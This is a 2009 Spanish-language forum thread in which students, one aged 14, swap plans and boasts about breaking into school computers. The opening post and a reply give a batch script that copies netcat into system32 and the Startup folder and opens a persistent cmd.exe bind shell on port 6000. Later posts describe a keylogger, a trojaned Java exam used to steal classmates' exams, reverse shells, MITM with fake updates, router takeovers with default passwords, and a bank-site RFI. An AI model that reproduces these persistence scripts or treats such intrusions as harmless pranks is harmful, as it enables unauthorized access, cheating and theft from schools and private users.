Título: Diario de un alumno en clase de informatica Publicado por: fede_cp en 3 Noviembre 2009, 04:45 am Diario de un alumno en clase de informatica Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase. Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real). NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD). Bueno empiezo con el mío: 14 computadoras (corriendo windows), en red (cable :P), una maquina server (windows server 2000) Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro) es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma. 1º archivo:coloca el netcat en system32 y se ejecuta 2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida y ejecutarlos). ARCHIVOS: 1º archivo:coloca el netcat en system32 y se ejecuta. lo tengo en .exe (lo compile con el quick batch compiler) es facil su funcionamiento copia de %MYFILES% a system32 y lo ejecuta 2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida. Código
simplemente eso. 3º archivo:ejecucion de un archivo (netcat a la escucha) Código
simplemente eso. Diagrama: (http://img682.imageshack.us/img682/6629/diagramaintrusion.jpg) Como pueden ver es muy sencillo, programitas programados en batch. si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba siempre algún error. asique decidi hacerlo por partes. bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión. en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje :D y lo pruebo. si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente. PD: tengo 14 años dentro de todo esta bien jajaja saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: Mindil en 3 Noviembre 2009, 12:01 pm yo tampoco soy un experto pero si corregidme si me equivoco XD. Para tenerlo todo en un archivo lo puesto asi...
@echo off copy "c:\nc.exe" "c:\WINDOWS\system32\" cd "c:\WINDOWS\system32\" copy "c:\WINDOWS\system32\nc.exe" "%userprofile%\Men£ Inicio\Programas\Inicio\" cd\ start nc.exe -L -d -e cmd.exe -p 6000 exit Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 3 Noviembre 2009, 16:24 pm Tu code no estaría mal si el nc.exe ya estaria en algun directorio, pero el problema es que el netcat en mi caso no lo estaba, entonces use el quick batch compiler, lo inclui (es una opcion que tiene el qbfc), y entonces use
@echo off copy %MYFILES%\nc.exe %systemroot%\system32 no es necesario poner change directory, porque al estar en system32, se ejecuta desde alli y no es necesario despues el otro copy si esta bien start nc.exe -L -d -e cmd.exe -p 6000 esto tambien esta bien, pero acordate que no es necesario poner cd porque por eso se lo paso a system32, para no tener que cambiar de directorio saludos! PD:comenten si les gusto la idea, seria un buen intercambio de difierentes tipso de intrusiones, en diferentes escenarios con diferentes restricciones y posibilidades. Título: Re: Diario de un alumno en clase de informatica Publicado por: VirajeCR en 3 Noviembre 2009, 18:44 pm 1º archivo:coloca el netcat en system32 y se ejecuta Como que la seguridad no existe por acá. :o Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 4 Noviembre 2009, 01:04 am 1º archivo:coloca el netcat en system32 y se ejecuta Como que la seguridad no existe por acá. :o El netcat no es reconocido por el nod 32 (no salta, en el escanneo si lo hace) saludos! Título: Re: Diario de un alumno en clase de informatica Publicado por: Novlucker en 4 Noviembre 2009, 01:14 am A lo que se refiere es que para poder meter en nc en esa carpeta necesitas permisos de Admin, y que esten habilitados en un salon es malo ... ahora, con respecto a tu método, aún no lo entiendo, quién ejecuta que cosa y de que manera? XD, tu metes esos archivos en una carpeta compartida?
Saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: jdc en 4 Noviembre 2009, 01:20 am Yo estoy jodido en mi escuela, ya que tienen el deep freeze última versión que sólo jodé el fdf boteable... Además sería mucho daño sólo para jugar :) lo que sí me gustaría hacer es joder el PC con Windows server que tiene instalado oracle para así ver como lo instalan de nuevo y aprender bien de forma práctica xD pero en mi vida he usado Windows server por lo tanto ni hablar de programar algo para joderlo
Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 4 Noviembre 2009, 01:53 am aca estoy, jaja, em es asi la cosa, osea yo tengo una carpeta, que NO es necesario ser admin para manejarlas y modificarlas, osea no hay casi nada de seguridad.
entonces por ejemplo yo si quiero puedo modificarle el nombre de la carpeta, puedo manejar los archivos, modificarlos, casi todo se puede hacer ;-) :laugh: entonces tengo que tener acceso fisico a cada una de las pc, y lo tengo, entonces me dirijo a la carpeta compartida que anteriormente había colocado los archivos, voy rapidamente sin que nadie se entere y ejecuto los dos archivos en su respectivo orden. si funciona lo voy a comentar. saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 4 Noviembre 2009, 02:08 am no se olviden, que es mejorable mucho mas, y por favor diganlo jajja, esa es la ideaa
y si tienen algun metodo posteenlo saludoos Título: Re: Diario de un alumno en clase de informatica Publicado por: 1112815 en 7 Noviembre 2009, 20:04 pm El otro día puse en keylogger muy simple en el portatil de mi cole. El caso es que tenía autologin como administrador (windows xp), así que puse en la carpeta inicio un keylogger ejecutable muy simple que lo que hace es guardar los logs en system32.
Nah, es por lammear un poco, si de verdad estuviera interesado haría que me mandara los logs por ftp o algo, pero me da pereza... que vago soy... xD Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 11 Noviembre 2009, 15:57 pm jaja, si alguien tienem as anecdotas, no se olviden de contarla!
saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: Castg! en 12 Noviembre 2009, 20:57 pm yo estoy en el proyecto con fede, vamos al mismo colegio, y el problema es el firewall de windows, que si uno trata de hacerlo lo mas "disimulado" posible, la vieja de
Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 13 Noviembre 2009, 00:16 am que recuerdos tomi, posta que nos
bueno por favor si alguien tiene alguna anecdota asi, cuentenla, aparte de la parte tecnica, los resultados saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: anarquistadel89 en 16 Noviembre 2009, 08:16 am Algo similar hice yo en mi instituto, en lugar de dejar el codigo del programa que teniamos que entregar, deje el ejecutable en la carpeta compartida, que no solo contenia el ejercicio :rolleyes:
5 minutos y obtuve la shell remota del profesor con una conexion inversa (netcat ftw!) Ni me moleste en hacer algo para que se auto-conectase, paso de meterme en lios xD Título: Re: Diario de un alumno en clase de informatica Publicado por: Constantinoplero en 16 Noviembre 2009, 18:47 pm Oye, ¿y el profesor no te dice que qué estás haciendo o algo? xD
Título: Re: Diario de un alumno en clase de informatica Publicado por: Og. en 16 Noviembre 2009, 19:19 pm xD
la clase de programacion en mi instituto es de 3 horas seguidas, las computadoras no son muy novedosas devido a que solo las usan para compilar cosas censillas, todas las pc's del aula usan xp sp2 con ie6, y de las 3 horas 1 la usan para navegar en internet y las otras para hacer los programas, entonces simplemente hago un Mitm y spoffeo la conexión al google.com con un exploit en local, a los 4 minutos ya tego shell remota xD Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 17 Noviembre 2009, 01:53 am bueno, aca voy a contar como me fue, el plan salio genial todo en su lugar, el unico problema es que para joder a la profe (ya tenia masomenos 6 pc) empeze a volverla loca, hasta que me vio con el cmd, y me dijo que esta haciendo, y le meti un re chamuyo (sabe menos que yo de informatica jajaj), y despues al final de la clase, se entero porque ya era obvio, y me dijo si entras de nuevo a los sitemas te voy a tener que sancionar, y bueno esa fue mi gran hazaña jajaja. a ver si a castg no lo descubren, esatamos en la mismo escuela.
saludos! Título: Re: Diario de un alumno en clase de informatica Publicado por: Leyer en 17 Noviembre 2009, 02:35 am los cuento en mi salon donde se ve informatica habian 20 cumputadoras conectadas por lan todas usaban linux , para infectarlas todas hice esto ( como todos programabamos en java y algunos examn eran .jar en mi examn le agregue un modulo que abriera un puerto en el sistema para poder aceder a la shell :laugh: , entonces entregue mi examn y la profe lo ejecuto en la maquina principal(Linux) :xD :-X una ves que lo hizo esa maquina la controle para sakar los examenes de los demas por la shell mientras entregaban yo los revisaba y los copiaba xd .jaja sake puro 20 en las siguientes 4 semanas xd: :laugh:
SALUDOS.!! Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 17 Noviembre 2009, 02:44 am ajjaja, que buena idea, esto esta bueno siempre y cuando se presente como se hizo (la base).
saludos! Título: Re: Diario de un alumno en clase de informatica Publicado por: Constantinoplero en 17 Noviembre 2009, 15:07 pm jajaj que loco
Título: Re: Diario de un alumno en clase de informatica Publicado por: braulio-- en 17 Noviembre 2009, 15:18 pm Yo tengo otro plan que haré cuando empiece a ver informática (3º trimestre):xD
Haré un MITM (con una versión de ettercap portable) y un DNS spoofing y lo dirigiré a mi maquina (de clase). Como webserver me llevaré uno muy simple programado por mí en C++ que lo único que haga sea mostrar una página que diga que tiene que actualizar no se que cosa (ya me inventaré algo, no saben nada de informática) y que se descarguen el archivo que enlazo. El archivo será cualquiera que me permita hacer algo gracioso :xD Como el profesor de tecnología es buena gente igual hasta se lo digo y se lo hago a otra persona cualquiera como demostración de que hay que ser precavido con la información que se encuentra en internet. Si encuentro algún exploit que funcione bien para IE6 hago eso en vez de todo el resto :xD Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 17 Noviembre 2009, 15:23 pm jajaja genial, buena idea la de la actualizacion!
saludos y a ver que se les ocurre! saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: anarquistadel89 en 17 Noviembre 2009, 17:16 pm El profe va a su bola xD
Título: Re: Diario de un alumno en clase de informatica Publicado por: gerard_88 en 24 Noviembre 2009, 22:47 pm Jajaj divertido es un rato, yo estoy estudiando administracion de sistemas informaticos, y saque la clave de admin de uno de los pc's, y el administrador era tan tonto que puso esa clave para todo, entonces, me conecte al server como admin, oh sorpresa archivos que no deberia ver... (no eran examenes no os emocioneis), pero habia unos pdf's con todas las mac's de los alumnos, las macs de los profes, y las ip's de los switches, se lo enseñe a mi profe de redes, y nos conectamos a el switch de aquella planta, y como el controla mucho mas que yo, me dijo, cierra este puerto, muy bien, acabas de dejar sin internet a las 2 primeras aulas, ahora cierra este, muy bien acabas de dejar sin internet a toda la planta, ahora ese, pues ahora has dejado sin internet a los profes.
Despues me puse la mac de un profe y me conecte a la wifi de la sala de profes (no hice ninguna cafrada, estoy pagando una pasta por este curso como para que me expulsen), por ultimo me conecte con putty al server y admin y la contraseña y padentro, pero no pude probar cosillas ni quitar el capador de web's que tienen porque necessitaba la contraseña root y ya no me mate para conseguirla. En el mismo pdf de los switches tenian el de los puntos de acceso, y ale, agregar mac's de los compañeros, iphones, algun profe tambien etc, sabiendo la ip y el user y pass regalado. Y despues lo tipico, control remoto entre pcs de clase, bucles, cain&abel, y abrirle la calculadora y cosas asi en medio de la explicacion con el proyector jaja. Un saludo. Título: Re: Diario de un alumno en clase de informatica Publicado por: Castg! en 24 Noviembre 2009, 22:59 pm jajaj! quiero estar en tu colegio! en el mio lo unico que tenemos sera, un windows xp que recien lo pusieron, porq antes teniaoms 98 :-(, como mucho hay un photoshop en alguna pc loca para... nose que curso esta viendo diseño grafico xD! jajajaj. che y una pregunta de un buen noob en redes xD! con que herramienta, programa, en que lenguaje o cosa rara cerraste los puertos? a mi me parece raro ya cerrar los mios XD! si alguien me ayuda con esto? me quedan 40 minutos de informatica este jueves y el que vienes y VACAS! jajjaja
Título: Re: Diario de un alumno en clase de informatica Publicado por: gerard_88 en 25 Noviembre 2009, 12:38 pm hombre... es un insti que cada curso son 4000€... como para que no se lo curren, en la 4a planta que es la de los ciclos, hay 40pcs por aula, 5 aulas, mas la sala de profes, el server que alli suben archivos y tal (NO EXAMENES NO SON TAN ESTUPIDOS), este server tiene todos los servicios, ftp, dns etc, tienen alli la web, el gic que es como un moodle, y demas cosas, amen de juegos que los subimos nosotros jaja.
Lo de cerrar los puertos, es porque son Switches HP con acceso ip e interficie grafica, es como conectarte por web a tu router pero envez de router un switch, y alli te salen todos los puertos, con el trafico, los que estan conectados y tal, pero claro tienes que saber cual tocar, y en eso me ayudo mi profe de redes jeje, amen que despues lo dejamos todo igual. Jaja y ahora que me acuerdo, el profe que llevaba el mantenimiento (un enxufado porque de informatico poco, es economista), un dia se quedo todo pillado, porque vio nosecuantos intentos de acceso al server claro yo ahi probando combinaciones para el root, pero no paso nada porque no sabe ni mirar la mac que lo intento (estamos en dhcp). Título: Re: Diario de un alumno en clase de informatica Publicado por: [u]nsigned en 26 Noviembre 2009, 02:56 am Yo descubrí una vulnerabilidad (RFI) en la web del Home Banking de un banco de acá, asi que si quisiera podria hacer phishing o carding a mi antojo, y tambien hasta colar un shell, pero la verdad que me interesa mas dominar el
Generalmente no disfruto hacer maldades, pero mas de una vez eh ingresado al ZyXEL p-600 de mi conocidos, aca en mi pequeña ciudad Speedy (Telefonica)le da ese routers a todos, y todos con la misma contraseña y con el remote-admin habilitada, asi que solo me hes cuestion de obtener IP's (con una 'imagen' generada en php que en relidad es un simple script que guarda el ip en un bb.dd). Asi que yo a cualquiera de aca le digo "che mira esta foto" y a cada uno le paso un ID unico por GET, asi se luego (a los pocos segundos) de quien es esa IP, y no me queda ams que entrar y hacer lo que se me plasca con su router :laugh: Pero nunca he hecho nada malo, me lo tengo reservado como posible venganza por algo en el futuro :-* Saludos Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 27 Noviembre 2009, 00:32 am No obviamente, no romper nada, volver loco al profe de informatica si, pero romper no, ni borrar.
saludos! Título: Re: Diario de un alumno en clase de informatica Publicado por: Castg! en 27 Noviembre 2009, 01:06 am Que no? borrar todo! pura venganza ARGENTINA RATA! TE VAMOS A ENTRAR FRENTE PARA LA VICTORIA! CHAU bbdd, todavia no conocen el Hacktivism, vengaza, los argentinos se revelaran de manera intelectual por mayor!
Título: Re: Diario de un alumno en clase de informatica Publicado por: fede_cp en 27 Noviembre 2009, 01:22 am Que no? borrar todo! pura venganza ARGENTINA RATA! TE VAMOS A ENTRAR FRENTE PARA LA VICTORIA! CHAU bbdd, todavia no conocen el Hacktivism, vengaza, los argentinos se revelaran de manera intelectual por mayor! ¬¬ >:( Título: Re: Diario de un alumno en clase de informatica Publicado por: [u]nsigned en 27 Noviembre 2009, 01:32 am La verdad que hoy poy hoy en Argentina (con la nueva ley de medios)al meterse con el Estado solo lograríamos ensuciar mas aun la reputacion de los hackers. ;)
Título: Re: Diario de un alumno en clase de informatica Publicado por: Castg! en 27 Noviembre 2009, 01:37 am jaja, muy buen punto, yo no me meteria, o tal vez si, me meteria, pero no borraria la base de datos por tanta sea la bronca que tenga, che de que zona sos¿? a dario le pregnute lo mismo jajaja, esta bueno tener por aca amigos del foro, yo de la oeste, a! buenos aires. no mas datos jajajaj
Título: Re: Diario de un alumno en clase de informatica Publicado por: Novlucker en 27 Noviembre 2009, 02:29 am Bonito chat! :D
Saludos |